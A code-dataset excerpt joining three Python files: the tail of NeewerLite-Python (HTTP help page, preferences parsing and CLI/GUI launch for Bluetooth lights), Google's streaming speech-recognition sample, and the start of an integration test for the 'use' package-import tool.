self.wfile.write(bytes("<STRONG>mode=</STRONG> - the mode (value: <EM>HSI, CCT, and either ANM or SCENE</EM>) - the color mode to switch the light to<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?mode=CCT</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<STRONG>use_preset=</STRONG> - (value: <EM>1-8</EM>) - use a custom global or snapshot preset<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?use_preset=2</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("(CCT mode only) <STRONG>temp=</STRONG> or <STRONG>temperature=</STRONG> - (value: <EM>3200 to 8500</EM>) the color temperature in CCT mode to set the light to<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?temp=5200</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("(HSI mode only) <STRONG>hue=</STRONG> - (value: <EM>0 to 360</EM>) the hue value in HSI mode to set the light to<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?hue=240</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("(HSI mode only) <STRONG>sat=</STRONG> or <STRONG>saturation=</STRONG> - (value: <EM>0 to 100</EM>) the color saturation value in HSI mode to set the light to<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?sat=65</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("(ANM/SCENE mode only) <STRONG>scene=</STRONG> - (value: <EM>1 to 9</EM>) which animation (scene) to switch the light to<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?scene=3</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("(CCT/HSI/ANM modes) <STRONG>bri=</STRONG>, <STRONG>brightness=</STRONG> or <STRONG>intensity=</STRONG> - (value: <EM>0 to 100</EM>) how bright you want the light<BR>\n", "utf-8"))
self.wfile.write(bytes(" Example: <EM>http://(server address)/NeewerLite-Python/doAction?brightness=80</EM><BR>\n", "utf-8"))
self.wfile.write(bytes("<BR><BR>More examples -<BR>\n", "utf-8"))
self.wfile.write(bytes(" Set the light with MAC address <EM>11:22:33:44:55:66</EM> to <EM>CCT</EM> mode, with a color temperature of <EM>5200</EM> and brightness of <EM>40</EM><BR>\n", "utf-8"))
self.wfile.write(bytes(" <EM>http://(server address)/NeewerLite-Python/doAction?light=11:22:33:44:55:66&mode=CCT&temp=5200&bri=40</EM><BR><BR>\n", "utf-8"))
self.wfile.write(bytes(" Set the light with MAC address <EM>11:22:33:44:55:66</EM> to <EM>HSI</EM> mode, with a hue of <EM>70</EM>, saturation of <EM>50</EM> and brightness of <EM>10</EM><BR>\n", "utf-8"))
self.wfile.write(bytes(" <EM>http://(server address)/NeewerLite-Python/doAction?light=11:22:33:44:55:66&mode=HSI&hue=70&sat=50&bri=10</EM><BR><BR>\n", "utf-8"))
self.wfile.write(bytes(" Set the first light available to <EM>SCENE</EM> mode, using the <EM>first</EM> animation and brightness of <EM>55</EM><BR>\n", "utf-8"))
self.wfile.write(bytes(" <EM>http://(server address)/NeewerLite-Python/doAction?light=1&mode=SCENE&scene=1&bri=55</EM><BR><BR>\n", "utf-8"))
self.wfile.write(bytes(" Use the 2nd custom preset, but don't render the webpage showing the results<BR>\n", "utf-8"))
self.wfile.write(bytes(" <EM>http://(server address)/NeewerLite-Python/doAction?use_preset=2&nopage</EM><BR>\n", "utf-8"))
elif theSection == "quicklinks":
footerLinks = "Shortcut links: "
footerLinks = footerLinks + "<A HREF='doAction?discover'>Scan for New Lights</A> | "
footerLinks = footerLinks + "<A HREF='doAction?list'>List Currently Available Lights and Custom Presets</A>"
self.wfile.write(bytes("<HR>" + footerLinks + "<HR>\n", "utf-8"))
elif theSection == "htmlendheaders":
self.wfile.write(bytes("<CENTER><A HREF='https://github.com/taburineagle/NeewerLite-Python/'>NeewerLite-Python 0.11</A> / HTTP Server / by Zach Glenwright<BR></CENTER>\n", "utf-8"))
self.wfile.write(bytes("</BODY>\n</HTML>", "utf-8"))
def formatStringForConsole(theString, maxLength):
if theString == "-": # return a header divider if the string is "="
return "-" * maxLength
else:
if len(theString) == maxLength: # if the string is the max length, then just return the string
return theString
if len(theString) < maxLength: # if the string fits in the max length, then add spaces to pad it out
return theString + " " * (maxLength - len(theString))
else: # truncate the string, it's too long
return theString[0:maxLength - 4] + " ..."
def createLightPrefsFolder():
#CREATE THE light_prefs FOLDER IF IT DOESN'T EXIST
try:
os.mkdir(os.path.dirname(os.path.abspath(sys.argv[0])) + os.sep + "light_prefs")
except FileExistsError:
pass # the folder already exists, so we don't need to create it
def loadPrefsFile(globalPrefsFile = ""):
global findLightsOnStartup, autoConnectToLights, printDebug, maxNumOfAttempts, \
rememberLightsOnExit, acceptable_HTTP_IPs, customKeys, enableTabsOnLaunch, \
whiteListedMACs, rememberPresetsOnExit
if globalPrefsFile != "":
printDebugString("Loading global preferences from file...")
fileToOpen = open(globalPrefsFile)
mainPrefs = fileToOpen.read().splitlines()
fileToOpen.close()
acceptable_arguments = ["findLightsOnStartup", "autoConnectToLights", "printDebug", "maxNumOfAttempts", "rememberLightsOnExit", "acceptableIPs", \
"SC_turnOffButton", "SC_turnOnButton", "SC_scanCommandButton", "SC_tryConnectButton", "SC_Tab_CCT", "SC_Tab_HSI", "SC_Tab_SCENE", "SC_Tab_PREFS", \
"SC_Dec_Bri_Small", "SC_Inc_Bri_Small", "SC_Dec_Bri_Large", "SC_Inc_Bri_Large", \
"SC_Dec_1_Small", "SC_Inc_1_Small", "SC_Dec_2_Small", "SC_Inc_2_Small", "SC_Dec_3_Small", "SC_Inc_3_Small", \
"SC_Dec_1_Large", "SC_Inc_1_Large", "SC_Dec_2_Large", "SC_Inc_2_Large", "SC_Dec_3_Large", "SC_Inc_3_Large", \
"enableTabsOnLaunch", "whiteListedMACs", "rememberPresetsOnExit"]
# KICK OUT ANY PARAMETERS THAT AREN'T IN THE "ACCEPTABLE ARGUMENTS" LIST ABOVE
# THIS SECTION OF CODE IS *SLIGHTLY* DIFFERENT THAN THE CLI KICK OUT CODE
# THIS WAY, WE CAN HAVE COMMENTS IN THE PREFS FILE IF DESIRED
for a in range(len(mainPrefs) - 1, -1, -1):
if not any(x in mainPrefs[a] for x in acceptable_arguments): # if the current argument is invalid
mainPrefs.pop(a) # delete the invalid argument from the list
# NOW THAT ANY STRAGGLERS ARE OUT, ADD DASHES TO WHAT REMAINS TO PROPERLY PARSE IN THE PARSER
for a in range(len(mainPrefs)):
mainPrefs[a] = "--" + mainPrefs[a]
else:
mainPrefs = [] # submit an empty list to return the default values for everything
prefsParser = argparse.ArgumentParser() # parser for preference arguments
# SET PROGRAM DEFAULTS
prefsParser.add_argument("--findLightsOnStartup", default=1)
prefsParser.add_argument("--autoConnectToLights", default=1)
prefsParser.add_argument("--printDebug", default=1)
prefsParser.add_argument("--maxNumOfAttempts", default=6)
prefsParser.add_argument("--rememberLightsOnExit", default=0)
prefsParser.add_argument("--acceptableIPs", default=["127.0.0.1", "192.168", "10.0.0"])
prefsParser.add_argument("--whiteListedMACs" , default=[])
prefsParser.add_argument("--rememberPresetsOnExit", default=1)
# SHORTCUT KEY CUSTOMIZATIONS
prefsParser.add_argument("--SC_turnOffButton", default="Ctrl+PgDown") # 0
prefsParser.add_argument("--SC_turnOnButton", default="Ctrl+PgUp") # 1
prefsParser.add_argument("--SC_scanCommandButton", default="Ctrl+Shift+S") # 2
prefsParser.add_argument("--SC_tryConnectButton", default="Ctrl+Shift+C") # 3
prefsParser.add_argument("--SC_Tab_CCT", default="Alt+1") # 4
prefsParser.add_argument("--SC_Tab_HSI", default="Alt+2") # 5
prefsParser.add_argument("--SC_Tab_SCENE", default="Alt+3") # 6
prefsParser.add_argument("--SC_Tab_PREFS", default="Alt+4") # 7
prefsParser.add_argument("--SC_Dec_Bri_Small", default="/") # 8
prefsParser.add_argument("--SC_Inc_Bri_Small", default="*") # 9
prefsParser.add_argument("--SC_Dec_Bri_Large", default="Ctrl+/") # 10
prefsParser.add_argument("--SC_Inc_Bri_Large", default="Ctrl+*") # 11
prefsParser.add_argument("--SC_Dec_1_Small", default="7") # 12
prefsParser.add_argument("--SC_Inc_1_Small", default="9") # 13
prefsParser.add_argument("--SC_Dec_2_Small", default="4") # 14
prefsParser.add_argument("--SC_Inc_2_Small", default="6") # 15
prefsParser.add_argument("--SC_Dec_3_Small", default="1") # 16
prefsParser.add_argument("--SC_Inc_3_Small", default="3") # 17
prefsParser.add_argument("--SC_Dec_1_Large", default="Ctrl+7") # 18
prefsParser.add_argument("--SC_Inc_1_Large", default="Ctrl+9") # 19
prefsParser.add_argument("--SC_Dec_2_Large", default="Ctrl+4") # 20
prefsParser.add_argument("--SC_Inc_2_Large", default="Ctrl+6") # 21
prefsParser.add_argument("--SC_Dec_3_Large", default="Ctrl+1") # 22
prefsParser.add_argument("--SC_Inc_3_Large", default="Ctrl+3") # 23
# "HIDDEN" DEBUG OPTIONS - oooooh!
# THESE ARE OPTIONS THAT HELP DEBUG THINGS, BUT AREN'T REALLY USEFUL FOR NORMAL OPERATION
# enableTabsOnLaunch SHOWS ALL TABS ACTIVE (INSTEAD OF DISABLING THEM) ON LAUNCH SO EVEN WITHOUT A LIGHT, A BYTESTRING CAN BE CALCULATED
prefsParser.add_argument("--enableTabsOnLaunch", default=0)
mainPrefs = prefsParser.parse_args(mainPrefs)
# SET GLOBAL VALUES BASED ON PREFERENCES
findLightsOnStartup = bool(int(mainPrefs.findLightsOnStartup)) # whether or not to scan for lights on launch
autoConnectToLights = bool(int(mainPrefs.autoConnectToLights)) # whether or not to connect to lights when found
printDebug = bool(int(mainPrefs.printDebug)) # whether or not to display debug messages in the console
maxNumOfAttempts = int(mainPrefs.maxNumOfAttempts) # maximum number of attempts before failing out
rememberLightsOnExit = bool(int(mainPrefs.rememberLightsOnExit)) # whether or not to remember light mode/settings when quitting out
rememberPresetsOnExit = bool(int(mainPrefs.rememberPresetsOnExit)) # whether or not to remember the custom presets when quitting out
if type(mainPrefs.acceptableIPs) is not list: # we have a string in the return, so we need to post-process it
acceptable_HTTP_IPs = mainPrefs.acceptableIPs.replace(" ", "").split(";") # split the IP addresses into a list for acceptable IPs
else: # the return is already a list (the default list), so return it
acceptable_HTTP_IPs = mainPrefs.acceptableIPs
if type(mainPrefs.whiteListedMACs) is not list: # if we've specified MAC addresses to whitelist, add them to the global list
whiteListedMACs = mainPrefs.whiteListedMACs.replace(" ", "").split(";")
# RETURN THE CUSTOM KEYBOARD MAPPINGS
customKeys = [mainPrefs.SC_turnOffButton, mainPrefs.SC_turnOnButton, mainPrefs.SC_scanCommandButton, mainPrefs.SC_tryConnectButton, \
mainPrefs.SC_Tab_CCT, mainPrefs.SC_Tab_HSI, mainPrefs.SC_Tab_SCENE, mainPrefs.SC_Tab_PREFS, \
mainPrefs.SC_Dec_Bri_Small, mainPrefs.SC_Inc_Bri_Small, mainPrefs.SC_Dec_Bri_Large, mainPrefs.SC_Inc_Bri_Large, \
mainPrefs.SC_Dec_1_Small, \
mainPrefs.SC_Inc_1_Small, \
mainPrefs.SC_Dec_2_Small, \
mainPrefs.SC_Inc_2_Small, \
mainPrefs.SC_Dec_3_Small, \
mainPrefs.SC_Inc_3_Small, \
mainPrefs.SC_Dec_1_Large, \
mainPrefs.SC_Inc_1_Large, \
mainPrefs.SC_Dec_2_Large, \
mainPrefs.SC_Inc_2_Large, \
mainPrefs.SC_Dec_3_Large, \
mainPrefs.SC_Inc_3_Large]
enableTabsOnLaunch = bool(int(mainPrefs.enableTabsOnLaunch))
if __name__ == '__main__':
singleInstanceLock() # make a lockfile if one doesn't exist yet, and quit out if one does
if os.path.exists(globalPrefsFile):
loadPrefsFile(globalPrefsFile) # if a preferences file exists, process it and load the preferences
else:
loadPrefsFile() # if it doesn't, then just load the defaults
if os.path.exists(customLightPresetsFile):
loadCustomPresets() # if there's a custom mapping for presets, then load that into memory
loop = asyncio.get_event_loop() # get the current asyncio loop
cmdReturn = [True] # initially set to show the GUI interface over the CLI interface
if len(sys.argv) > 1: # if we have more than 1 argument on the command line (the script itself is argument 1), then process switches
cmdReturn = processCommands()
printDebug = cmdReturn[1] # if we use the --quiet option, then don't show debug strings in the console
if cmdReturn[0] == False: # if we're trying to load the CLI, make sure we aren't already running another version of it
doAnotherInstanceCheck() # check to see if another instance is running, and if it is, then error out and quit
# START HTTP SERVER HERE AND SIT IN THIS LOOP UNTIL THE END
if cmdReturn[0] == "HTTP":
doAnotherInstanceCheck() # check to see if another instance is running, and if it is, then error out and quit
webServer = ThreadingHTTPServer(("", 8080), NLPythonServer)
try:
printDebugString("Starting the HTTP Server on Port 8080...")
printDebugString("-------------------------------------------------------------------------------------")
# start the HTTP server and wait for requests
webServer.serve_forever()
except KeyboardInterrupt:
pass
finally:
printDebugString("Stopping the HTTP Server...")
webServer.server_close()
# DISCONNECT FROM EACH LIGHT BEFORE FINISHING THE PROGRAM
printDebugString("Attempting to unlink from lights...")
loop.run_until_complete(parallelAction("disconnect", [-1], False)) # disconnect from all lights in parallel
printDebugString("Closing the program NOW")
singleInstanceUnlockandQuit(0) # delete the lock file and quit out
if cmdReturn[0] == "LIST":
doAnotherInstanceCheck() # check to see if another instance is running, and if it is, then error out and quit
print("NeewerLite-Python 0.11 by Zach Glenwright")
print("Searching for nearby Neewer lights...")
loop.run_until_complete(findDevices())
if len(availableLights) > 0:
print()
if len(availableLights) == 1: # we only found one
print("We found 1 Neewer light on the last search.")
else: # we found more than one
print("We found " + str(len(availableLights)) + " Neewer lights on the last search.")
print()
if platform.system() == "Darwin": # if we're on MacOS, then we display the GUID instead of the MAC address
addressCharsAllowed = 36 # GUID addresses are 36 characters long
addressString = "GUID (MacOS)"
else:
addressCharsAllowed = 17 # MAC addresses are 17 characters long
addressString = "MAC Address"
nameCharsAllowed = 79 - addressCharsAllowed # the remaining space is to display the light name
# PRINT THE HEADERS
print(formatStringForConsole("Custom Name (Light Type)", nameCharsAllowed) + \
" " + \
formatStringForConsole(addressString, addressCharsAllowed))
# PRINT THE SEPARATORS
print(formatStringForConsole("-", nameCharsAllowed) + " " + formatStringForConsole("-", addressCharsAllowed))
# PRINT THE LIGHTS
for a in range(len(availableLights)):
lightName = availableLights[a][2] + "(" + availableLights[a][0].name + ")"
print(formatStringForConsole(lightName, nameCharsAllowed) + " " + \
formatStringForConsole(availableLights[a][0].address, addressCharsAllowed))
print(formatStringForConsole(" > RSSI: " + str(availableLights[a][0].rssi) + "dBm", nameCharsAllowed))
else:
print("We did not find any Neewer lights on the last search.")
singleInstanceUnlockandQuit(0) # delete the lock file and quit out
printDebugString(" > Launch GUI: " + str(cmdReturn[0]))
printDebugString(" > Show Debug Strings on Console: " + str(cmdReturn[1]))
printDebugString(" > Mode: " + cmdReturn[3])
if cmdReturn[3] == "CCT":
printDebugString(" > Color Temperature: " + str(cmdReturn[4]) + "00K")
printDebugString(" > Brightness: " + str(cmdReturn[5]))
elif cmdReturn[3] == "HSI":
printDebugString(" > Hue: " + str(cmdReturn[4]))
printDebugString(" > Saturation: " + str(cmdReturn[5]))
printDebugString(" > Brightness: " + str(cmdReturn[6]))
elif cmdReturn[3] == "ANM":
printDebugString(" > Scene: " + str(cmdReturn[4]))
printDebugString(" > Brightness: " + str(cmdReturn[5]))
if cmdReturn[0] == False: # if we're not showing the GUI, we need to specify a MAC address
if cmdReturn[2] != "":
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> MAC Address of light to send command to: " + cmdReturn[2].upper())
loop.run_until_complete(connectToOneLight(cmdReturn[2])) # get Bleak object linking to this specific light and getting custom prefs
else:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> You did not specify a light to send the command to - use the --light switch")
printDebugString(" > CLI >> and write either a MAC Address (XX:XX:XX:XX:XX:XX) to a Neewer light or")
printDebugString(" > CLI >> ALL to send to all available Neewer lights found by Bluetooth")
printDebugString("-------------------------------------------------------------------------------------")
if cmdReturn[0] == True: # launch the GUI with the command-line arguments
if importError == 0:
try: # try to load the GUI
app = QApplication(sys.argv)
if anotherInstance == True: # different than the CLI handling, the GUI needs to show a dialog box asking to quit or launch
errDlg = QMessageBox()
errDlg.setWindowTitle("Another Instance Running!")
errDlg.setTextFormat(Qt.TextFormat.RichText)
errDlg.setText("There is another instance of NeewerLite-Python already running. Please close out of that instance first before trying to launch a new instance of the program.<br><br>If you are positive that you don't have any other instances running and you want to launch a new one anyway, click <em>Launch New Instance</em> below. Otherwise click <em>Quit</em> to quit out.")
errDlg.addButton("Launch New Instance", QMessageBox.ButtonRole.YesRole)
errDlg.addButton("Quit", QMessageBox.ButtonRole.NoRole)
errDlg.setDefaultButton(QMessageBox.No)
errDlg.setIcon(QMessageBox.Warning)
button = errDlg.exec_()
if button == 1: # if we clicked the Quit button, then quit out
sys.exit(1)
mainWindow = MainWindow()
# SET UP GUI BASED ON COMMAND LINE ARGUMENTS
if len(cmdReturn) > 1:
if cmdReturn[3] == "CCT": # set up the GUI in CCT mode with specified parameters (or default, if none)
mainWindow.setUpGUI(colorMode=cmdReturn[3], temp=cmdReturn[4], brightness=cmdReturn[5])
elif cmdReturn[3] == "HSI": # set up the GUI in HSI mode with specified parameters (or default, if none)
mainWindow.setUpGUI(colorMode=cmdReturn[3], hue=cmdReturn[4], sat=cmdReturn[5], brightness=cmdReturn[6])
elif cmdReturn[3] == "ANM": # set up the GUI in ANM mode with specified parameters (or default, if none)
mainWindow.setUpGUI(colorMode=cmdReturn[3], scene=cmdReturn[4], brightness=cmdReturn[5])
mainWindow.show()
# START THE BACKGROUND THREAD
workerThread = threading.Thread(target=workerThread, args=(loop,), name="workerThread")
workerThread.start()
ret = app.exec_()
singleInstanceUnlockandQuit(ret) # delete the lock file and quit out
except NameError:
pass # same as above - we could not load the GUI, but we have already sorted error messages
else:
if importError == 1: # we can't load PySide2
print(" ===== CAN NOT FIND PYSIDE2 LIBRARY =====")
print(" You don't have the PySide2 Python library installed. If you're only running NeewerLite-Python from")
print(" a command-line (from a Raspberry Pi CLI for instance), or using the HTTP server, you don't need this package.")
print(" If you want to launch NeewerLite-Python with the GUI, you need to install the PySide2 package.")
print()
print(" To install PySide2, run either pip or pip3 from the command line:")
print(" pip install PySide2")
print(" pip3 install PySide2")
print()
print(" Or visit this website for more information:")
print(" https://pypi.org/project/PySide2/")
elif importError == 2: # we have PySide2, but can't load the GUI file itself for some reason
print(" ===== COULD NOT LOAD/FIND GUI FILE =====")
print(" If you don't need to use the GUI, you are fine going without the PySide2 pacakge.")
print(" but using NeewerLite-Python with the GUI requires the PySide2 library.")
print()
print(" If you have already installed the PySide2 library but are still getting this error message,")
print(" Make sure you have the ui_NeewerLightUI.py script in the same directory as NeewerLite-Python.py")
print(" If you don't know where that file is, redownload the NeewerLite-Python package from Github here:")
print(" https://github.com/taburineagle/NeewerLite-Python/")
sys.exit(1) # quit out, we can't run the program without PySide2 or the GUI (for the GUI version, at least)
else: # don't launch the GUI, send command to a light/lights and quit out
if len(cmdReturn) > 1:
if cmdReturn[3] == "CCT": # calculate CCT bytestring
calculateByteString(colorMode=cmdReturn[3], temp=cmdReturn[4], brightness=cmdReturn[5])
elif cmdReturn[3] == "HSI": # calculate HSI bytestring
calculateByteString(colorMode=cmdReturn[3], HSI_H=cmdReturn[4], HSI_S=cmdReturn[5], HSI_I=cmdReturn[6])
elif cmdReturn[3] == "ANM": # calculate ANM/SCENE bytestring
calculateByteString(colorMode=cmdReturn[3], animation=cmdReturn[4], brightness=cmdReturn[5])
elif cmdReturn[3] == "ON": # turn the light on
setPowerBytestring("ON")
elif cmdReturn[3] == "OFF": # turn the light off
setPowerBytestring("OFF")
if availableLights != []:
printDebugString(" > CLI >> Bytestring to send to light:" + updateStatus())
# CONNECT TO THE LIGHT AND SEND INFORMATION TO IT
isFinished = False
numOfAttempts = 1
while isFinished == False:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Attempting to connect to light (attempt " + str(numOfAttempts) + " of " + str(maxNumOfAttempts) + ")")
printDebugString("-------------------------------------------------------------------------------------")
isFinished = loop.run_until_complete(connectToLight(0, False))
if numOfAttempts < maxNumOfAttempts:
numOfAttempts = numOfAttempts + 1
else:
printDebugString("Error connecting to light " + str(maxNumOfAttempts) + " times - quitting out")
singleInstanceUnlockandQuit(1) # delete the lock file and quit out
isFinished = False
numOfAttempts = 1
while isFinished == False:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Attempting to write to light (attempt " + str(numOfAttempts) + " of " + str(maxNumOfAttempts) + ")")
printDebugString("-------------------------------------------------------------------------------------")
isFinished = loop.run_until_complete(writeToLight(0, False))
if numOfAttempts < maxNumOfAttempts:
numOfAttempts = numOfAttempts + 1
else:
printDebugString("Error writing to light " + str(maxNumOfAttempts) + " times - quitting out")
singleInstanceUnlockandQuit(1) # delete the lock file and quit out
isFinished = False
numOfAttempts = 1
while isFinished == False:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Attempting to disconnect from light (attempt " + str(numOfAttempts) + " of " + str(maxNumOfAttempts) + ")")
printDebugString("-------------------------------------------------------------------------------------")
isFinished = loop.run_until_complete(disconnectFromLight(0))
if numOfAttempts < maxNumOfAttempts:
numOfAttempts = numOfAttempts + 1
else:
printDebugString("Error disconnecting from light " + str(maxNumOfAttempts) + " times - quitting out")
singleInstanceUnlockandQuit(1) # delete the lock file and quit out
else:
printDebugString("-------------------------------------------------------------------------------------")
printDebugString(" > CLI >> Calculated bytestring:" + updateStatus())
singleInstanceUnlockandQuit(0) # delete the lock file and quit out
|
transcribe_streaming.py
|
#!/usr/bin/python
# Copyright (C) 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Sample that streams audio to the Google Cloud Speech API via GRPC."""
from __future__ import division
import contextlib
import re
import signal
import threading
from google.cloud import credentials
from google.cloud.speech.v1beta1 import cloud_speech_pb2 as cloud_speech
from google.rpc import code_pb2
from grpc.beta import implementations
from grpc.framework.interfaces.face import face
import pyaudio
from six.moves import queue
# Audio recording parameters
RATE = 16000
CHUNK = int(RATE / 10) # 100ms
# The Speech API has a streaming limit of 60 seconds of audio*, so keep the
# connection alive for that long, plus some more to give the API time to figure
# out the transcription.
# * https://g.co/cloud/speech/limits#content
DEADLINE_SECS = 60 * 3 + 5
SPEECH_SCOPE = 'https://www.googleapis.com/auth/cloud-platform'
def make_channel(host, port):
"""Creates an SSL channel with auth credentials from the environment."""
# In order to make an https call, use an ssl channel with defaults
ssl_channel = implementations.ssl_channel_credentials(None, None, None)
# Grab application default credentials from the environment
creds = credentials.get_credentials().create_scoped([SPEECH_SCOPE])
# Add a plugin to inject the creds into the header
auth_header = (
'Authorization',
'Bearer ' + creds.get_access_token().access_token)
auth_plugin = implementations.metadata_call_credentials(
lambda _, cb: cb([auth_header], None),
name='google_creds')
# compose the two together for both ssl and google auth
composite_channel = implementations.composite_channel_credentials(
ssl_channel, auth_plugin)
return implementations.secure_channel(host, port, composite_channel)
def _audio_data_generator(buff):
"""A generator that yields all available data in the given buffer.
Args:
buff - a Queue object, where each element is a chunk of data.
Yields:
A chunk of data that is the aggregate of all chunks of data in `buff`.
The function will block until at least one data chunk is available.
"""
while True:
# Use a blocking get() to ensure there's at least one chunk of data
chunk = buff.get()
if not chunk:
# A falsey value indicates the stream is closed.
break
data = [chunk]
# Now consume whatever other data's still buffered.
while True:
try:
data.append(buff.get(block=False))
except queue.Empty:
break
yield b''.join(data)
def _fill_buffer(audio_stream, buff, chunk):
"""Continuously collect data from the audio stream, into the buffer."""
try:
while True:
buff.put(audio_stream.read(chunk))
except IOError:
# This happens when the stream is closed. Signal that we're done.
buff.put(None)
# [START audio_stream]
@contextlib.contextmanager
def record_audio(rate, chunk):
"""Opens a recording stream in a context manager."""
audio_interface = pyaudio.PyAudio()
audio_stream = audio_interface.open(
format=pyaudio.paInt16,
# The API currently only supports 1-channel (mono) audio
# https://goo.gl/z757pE
channels=1, rate=rate,
input=True, frames_per_buffer=chunk,
)
# Create a thread-safe buffer of audio data
buff = queue.Queue()
# Spin up a separate thread to buffer audio data from the microphone
# This is necessary so that the input device's buffer doesn't overflow
# while the calling thread makes network requests, etc.
fill_buffer_thread = threading.Thread(
target=_fill_buffer, args=(audio_stream, buff, chunk))
fill_buffer_thread.start()
yield _audio_data_generator(buff)
audio_stream.stop_stream()
audio_stream.close()
fill_buffer_thread.join()
audio_interface.terminate()
# [END audio_stream]
def request_stream(data_stream, rate):
"""Yields `StreamingRecognizeRequest`s constructed from a recording audio
stream.
Args:
data_stream: A generator that yields raw audio data to send.
rate: The sampling rate in hertz.
"""
# The initial request must contain metadata about the stream, so the
# server knows how to interpret it.
recognition_config = cloud_speech.RecognitionConfig(
# There are a bunch of config options you can specify. See
# https://goo.gl/KPZn97 for the full list.
encoding='LINEAR16', # raw 16-bit signed LE samples
sample_rate=rate, # the rate in hertz
# See
# https://g.co/cloud/speech/docs/best-practices#language_support
# for a list of supported languages.
language_code='en-US', # a BCP-47 language tag
)
streaming_config = cloud_speech.StreamingRecognitionConfig(
config=recognition_config,
)
yield cloud_speech.StreamingRecognizeRequest(
streaming_config=streaming_config)
for data in data_stream:
# Subsequent requests can all just have the content
yield cloud_speech.StreamingRecognizeRequest(audio_content=data)
def listen_print_loop(recognize_stream):
for resp in recognize_stream:
if resp.error.code != code_pb2.OK:
raise RuntimeError('Server error: ' + resp.error.message)
# Display the transcriptions & their alternatives
for result in resp.results:
print(result.alternatives)
# Exit recognition if any of the transcribed phrases could be
# one of our keywords.
if any(re.search(r'\b(exit|quit)\b', alt.transcript, re.I)
for result in resp.results
for alt in result.alternatives):
print('Exiting..')
break
def main():
with cloud_speech.beta_create_Speech_stub(
make_channel('speech.googleapis.com', 443)) as service:
# For streaming audio from the microphone, there are three threads.
# First, a thread that collects audio data as it comes in
with record_audio(RATE, CHUNK) as buffered_audio_data:
# Second, a thread that sends requests with that data
requests = request_stream(buffered_audio_data, RATE)
# Third, a thread that listens for transcription responses
recognize_stream = service.StreamingRecognize(
requests, DEADLINE_SECS)
# Exit things cleanly on interrupt
signal.signal(signal.SIGINT, lambda *_: recognize_stream.cancel())
# Now, put the transcription responses to use.
try:
listen_print_loop(recognize_stream)
recognize_stream.cancel()
except face.CancellationError:
# This happens because of the interrupt handler
pass
if __name__ == '__main__':
main()
|
integration_test.py
|
import functools
import os
import re
import sys
import tempfile
import warnings
from collections.abc import Callable
from contextlib import closing
from importlib.machinery import SourceFileLoader
from pathlib import Path
from threading import _shutdown_locks
import packaging.tags
import packaging.version
import pytest
if Path("src").is_dir():
sys.path.insert(0, "") if "" not in sys.path else None
lpath, rpath = (
sys.path[: sys.path.index("") + 1],
sys.path[sys.path.index("") + 2 :],
)
try:
sys.path.clear()
sys.path.__iadd__(lpath + [os.path.join(os.getcwd(), "src")] + rpath)
import use
finally:
sys.path.clear()
sys.path.__iadd__(lpath + rpath)
import_base = Path(__file__).parent.parent / "src"
is_win = sys.platform.startswith("win")
import use
__package__ = "tests"
from tests.unit_test import reuse, ScopedCwd
import logging
log = logging.getLogger(".".join((__package__, __name__)))
log.setLevel(logging.DEBUG if use.config["debugging"] else logging.NOTSET)
params = [
# ("olefile", "0.46"), # Windows-only
("workerpool", "0.9.4"),
("fastcache", "1.1.0"),
("pytest-cov", "2.12.1"),
("pytest-env", "0.6.2"),
("requests", "2.24.0"),
("furl", "2.1.2"),
("wheel", "0.36.2"),
("icontract", "2.5.4"),
("tiledb", "0.9.5"),
("wurlitzer", "3.0.2"),
# ("cctools", "7.0.17"), # too slow, takes minutes to build
("clang", "9.0"),
]
@pytest.mark.parametrize("name,version", params)
def test_sample(reuse, name, version):
try:
reuse(name, version=version, modes=reuse.auto_install)
except BaseException as ie:
suggestion = ie.args[0].strip().splitlines()[-1]
log.debug("suggestion = %s", repr(suggestion))
mod = eval(suggestion)
assert mod
return
assert False, "Should raise ImportError: missing hashes."
@pytest.mark.parametrize("name, version", (("numpy", "1.19.3"),))
def test_86_numpy(reuse, name, version):
use = reuse # for the eval() later
with pytest.raises(RuntimeWarning) as w:
reuse(name, version=version, modes=reuse.auto_install)
assert w
recommendation = str(w.value).split("\n")[-1].strip()
mod = eval(recommendation)
assert mod.__name__ == reuse._parse_name(name)[1]
return mod # for the redownload test
def test_redownload_module(reuse):
def inject_fault(*, path, **kwargs):
log.info("fault_inject: deleting %s", path)
path.delete()
assert test_86_numpy(reuse, "example-pypi-package/examplepy", "0.1.0")
try:
reuse.config["fault_inject"] = inject_fault
assert test_86_numpy(reuse, "example-pypi-package/examplepy", "0.1.0")
finally:
del reuse.config["fault_inject"]
assert test_86_numpy(reuse, "example-pypi-package/examplepy", "0.1.0")
def double_function(func):
import functools
@functools.wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs) * 2
return wrapper
def test_aspectize_defaults(reuse):
# baseline
srcdir = Path(__file__).parent.parent.parent
if "tests.simple_funcs" in sys.modules:
del sys.modules["tests.simple_funcs"]
with ScopedCwd(srcdir):
mod = reuse(reuse.Path("./tests/simple_funcs.py"), package_name="tests")
assert mod.two() == 2
def test_aspectize_function_by_name(reuse):
# functions with specific names only
